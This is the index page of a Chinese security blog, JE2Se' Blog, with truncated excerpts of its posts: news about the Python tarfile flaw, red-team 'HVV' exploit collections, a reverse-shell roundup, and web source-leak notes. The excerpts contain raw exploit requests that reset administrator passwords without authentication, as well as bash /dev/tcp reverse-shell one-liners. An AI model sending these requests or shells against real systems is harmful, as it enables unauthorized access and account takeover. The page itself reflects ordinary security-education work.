JE2Se ' Blog

  • Web安全
  • 移动安全
  • 应急响应
  • 安全工具
  • 实用技巧
  • 安全学习
  • Python应用
Python应用

被忽视15年的Python漏洞

事件概述 据The Hacker News报道,在Python模块库中,存在一个一个长达15年未修复的安全漏洞,该漏洞可能导致约35万的项目陷入风险之中。这个存在安全风险的模块为tarfile模块,该模块涉及人工智能/机器学习、网络开发、媒体、安全、IT管理等多个领域。 其实早在2007年,该漏洞就已经被安全研究人员披露,并且标记过CVE-2007-4559,但是至今为止并没有获得正式的修复补丁,该漏洞尚未修复,已被无意间添加到全球几十万个开源和闭源项目中,从而可能造成庞大的软件供应链攻击面。 研究人员在分析影响后…

2022年10月19日 0条评论 154点热度 0人点赞 JE2Se 阅读全文
Web安全

HVV漏洞合集EXP3

一、ThinkAdminV6 任意文件操作 Update.php 三个函数未校验访问权限 目录遍历注意POST数据包rules参数值需要URL编码 POST /admin.html?s=admin/api.Update/node rules=%5B%22.%2F%22%5D 文件读取,后面那一串是UTF8字符串加密后的结果。计算方式在Update.php中的加密函数。 /admin.html?s=admin/api.Update/get/encode/ 34392q302x2r1b37382p382x2r1b1a1…

2020年9月17日 0条评论 3409点热度 3人点赞 JE2Se 阅读全文
Web安全

HVV漏洞合集EXP2

1、Apache DolphinScheduler权限覆盖漏洞[CVE-2020-13922] 大概就长这个样子 POST /dolphinscheduler/users/update id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone= 2、齐治堡垒机远程代码执行 POST /shterm/listener/tui_update.php a=…

2020年9月15日 0条评论 3186点热度 2人点赞 JE2Se 阅读全文
Web安全

HVV漏洞合集EXP

1、天融信数据防泄漏系统越权修改管理员密码 无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。 POST /?module=auth_user&action=mod_edit_pwd Cookie: username=superman; uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1 2、绿盟U…

2020年9月14日 0条评论 4643点热度 0人点赞 JE2Se 阅读全文
Web安全

反弹shell的几种方式总结

假设本机地址10.10.10.11,监听端口443。 1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i >& /dev/tcp/10.10.10.11/443 0>&1 /bin/bash -i > /dev/tcp/10.10.10.11/443 0<& 2>&1 exec 5<>/dev/tcp/10.10.10.11/443;cat <…

2020年9月11日 1条评论 3856点热度 3人点赞 JE2Se 阅读全文
Web安全

Web源码泄露相关漏洞总结

总结了一些常见的web源码泄露漏洞,这些漏洞有的会泄露一些敏感的信息,会有意外的收获~

2020年9月11日 0条评论 2406点热度 1人点赞 JE2Se 阅读全文
12345…16

JE2Se

半道出家安全行业,行业菜鸡~
喜好安全测试,安全开发
期待各位大佬的爱抚~

站内搜索
标签聚合
应急响应 神器 BurpSuite Web安全 xss badusb wifi python
最新 热点 随机
最新 热点 随机
被忽视15年的Python漏洞 HVV漏洞合集EXP3 HVV漏洞合集EXP2 HVV漏洞合集EXP 反弹shell的几种方式总结 Web源码泄露相关漏洞总结
被忽视15年的Python漏洞
业务安全漏洞解析 Firefox浏览器安全人员插件集合 BurpSuite_Pro_v1.7.30~温馨圣诞礼物~ [原创]AssetScan内网脆弱面分析工具 Windows的CMD命令整理 APP在线检测网站列表
最近评论
北木南 发布于 10 个月前(04月22日) 大佬,收到消息了,回我一下
北木南 发布于 10 个月前(04月22日) 请教下,这个则么用呀
666 发布于 1 年前(02月09日) Great article.
念长辞 发布于 2 年前(12月15日) 大佬,这个还更新吗
sk001 发布于 2 年前(09月24日) :smile: 收藏了 嘿嘿
理想三旬-陈鸿宇
https://www.je2se.com/wp-content/uploads/2019/08/2019080401551329.mp3
友情链接
  • SecIN社区
  • VFsec Team
  • WaBUG
  • 云众可信
  • 子杰'Blog
  • 猎豹安全实验室
  • 阿峰‘Blog

COPYRIGHT © 2022 JE2Se ' Blog.

京ICP备17069779号-1